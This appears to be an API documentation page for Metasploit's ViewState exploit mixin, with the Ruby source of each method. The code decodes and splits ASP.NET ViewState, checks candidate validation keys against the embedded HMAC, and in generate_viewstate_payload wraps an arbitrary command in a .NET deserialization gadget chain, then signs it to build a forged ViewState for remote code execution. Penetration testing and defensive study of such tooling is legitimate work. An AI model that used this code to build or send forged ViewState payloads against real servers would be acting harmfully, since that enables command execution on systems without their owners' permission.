Module: Msf::Exploit::ViewState
- Defined in:
- lib/msf/core/exploit/viewstate.rb
Instance Method Summary
- #can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') ⇒ Boolean
- #decode_viewstate(encoded_viewstate, algo: 'sha1') ⇒ Object
- #generate_viewstate(data, extra: '', algo: 'sha1', key: '') ⇒ Object
- #generate_viewstate_hmac(data, algo: 'sha1', key: '') ⇒ Object
- #generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') ⇒ Object
- #initialize(info = {}) ⇒ Object
Instance Method Details
#can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') ⇒ Boolean
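# File 'lib/msf/core/exploit/viewstate.rb', line 87

# Checks whether the supplied validation key reproduces the HMAC carried by
# an existing ViewState. A true result means the key (together with +extra+
# and +algo+) matches the one the blob was signed with.
#
# @param encoded_viewstate [String] Base64-encoded ViewState, MAC included
# @param extra [String] additional bytes that were mixed into the MAC input
#   after the ViewState data
# @param algo [String] digest name used for the HMAC
# @param key [String] candidate validation key
# @return [Boolean] true when the recomputed HMAC equals the embedded one;
#   false when they differ or the ViewState could not be split
def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
  # The MAC length depends on the digest, so the blob has to be split with the
  # same algorithm that is used for the comparison below. Without forwarding
  # +algo+ the split always assumed a SHA-1 sized MAC.
  viewstate = decode_viewstate(encoded_viewstate, algo: algo)

  unless viewstate[:data]
    vprint_error('Could not retrieve ViewState data')
    return false
  end

  unless (their_hmac = viewstate[:hmac])
    vprint_error('Could not retrieve ViewState HMAC')
    return false
  end

  our_hmac = generate_viewstate_hmac(
    viewstate[:data] + extra,
    algo: algo,
    key: key
  )

  our_hmac == their_hmac
end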
#decode_viewstate(encoded_viewstate, algo: 'sha1') ⇒ Object
# File 'lib/msf/core/exploit/viewstate.rb', line 65

# Splits a Base64-encoded ViewState into its data and its trailing HMAC.
#
# The input is rejected unless re-encoding the decoded bytes gives back the
# exact input string. The MAC length is taken from the digest size of +algo+,
# so a wrong +algo+ puts the split in the wrong place.
#
# @param encoded_viewstate [String] Base64-encoded ViewState
# @param algo [String] digest name that determines the MAC length
# @return [Hash] +{data:, hmac:}+; either value is nil when that part could
#   not be recovered
def decode_viewstate(encoded_viewstate, algo: 'sha1')
  raw = Rex::Text.decode_base64(encoded_viewstate)

  # Round-trip check: anything that does not re-encode to the input is not
  # treated as valid Base64.
  if Rex::Text.encode_base64(raw) != encoded_viewstate
    vprint_error('Could not decode ViewState')
    return { data: nil, hmac: nil }
  end

  # Digest size for this algorithm, measured on an empty message.
  mac_size = generate_viewstate_hmac('', algo: algo).length

  body = raw[0...-mac_size]
  if body.empty?
    vprint_error('Could not parse ViewState data')
    body = nil
  end

  # nil when the decoded blob is shorter than one MAC.
  mac = raw[-mac_size..-1]
  vprint_error('Could not parse ViewState HMAC') unless mac

  { data: body, hmac: mac }
end
#generate_viewstate(data, extra: '', algo: 'sha1', key: '') ⇒ Object
# File 'lib/msf/core/exploit/viewstate.rb', line 53

# Builds a signed, Base64-encoded ViewState from raw data.
#
# @param data [String] ViewState data to sign
# @param extra [String] bytes appended to +data+ for the MAC computation
#   only; they are not part of the returned blob
# @param algo [String] digest name used for the HMAC
# @param key [String] validation key
# @return [String] Base64 of +data+ followed by its HMAC
def generate_viewstate(data, extra: '', algo: 'sha1', key: '')
  # The MAC covers data plus the extra bytes.
  mac_input = data + extra
  signature = generate_viewstate_hmac(mac_input, algo: algo, key: key)

  # Only data and MAC are encoded.
  signed_blob = data + signature
  Rex::Text.encode_base64(signed_blob)
end
#generate_viewstate_hmac(data, algo: 'sha1', key: '') ⇒ Object
# File 'lib/msf/core/exploit/viewstate.rb', line 61

# Computes the raw (binary) HMAC of +data+.
#
# @param data [String] message to authenticate
# @param algo [String] digest name understood by OpenSSL
# @param key [String] HMAC key; decode_viewstate calls this with the default
#   empty key purely to measure the digest length
# @return [String] binary digest
def generate_viewstate_hmac(data, algo: 'sha1', key: '')
  digest = OpenSSL::Digest.new(algo)
  OpenSSL::HMAC.digest(digest, key, data)
end
#generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') ⇒ Object
# File 'lib/msf/core/exploit/viewstate.rb', line 43

# Serializes +cmd+ with Msf::Util::DotNetDeserialization using the
# LosFormatter and the gadget chain named by the DotNetGadgetChain option,
# then hands the result to generate_viewstate for signing and encoding.
#
# @param cmd [String] command passed to the serializer
# @param extra [String] forwarded to generate_viewstate
# @param algo [String] forwarded to generate_viewstate
# @param key [String] forwarded to generate_viewstate
# @return [Object] whatever generate_viewstate returns
def generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '')
  # The option value is converted to a symbol before being handed over.
  chain = datastore['DotNetGadgetChain'].to_sym

  serialized = Msf::Util::DotNetDeserialization.generate(
    cmd,
    gadget_chain: chain,
    formatter: :LosFormatter
  )

  generate_viewstate(serialized, extra: extra, algo: algo, key: key)
end
#initialize(info = {}) ⇒ Object
# File 'lib/msf/core/exploit/viewstate.rb', line 27 def initialize(info = {}) super ([ OptEnum.new( 'DotNetGadgetChain', [ true, '.NET gadget chain to use in ViewState', :TextFormattingRunProperties, Msf::Util::DotNetDeserialization::GadgetChains::NAMES ] ) ]) end |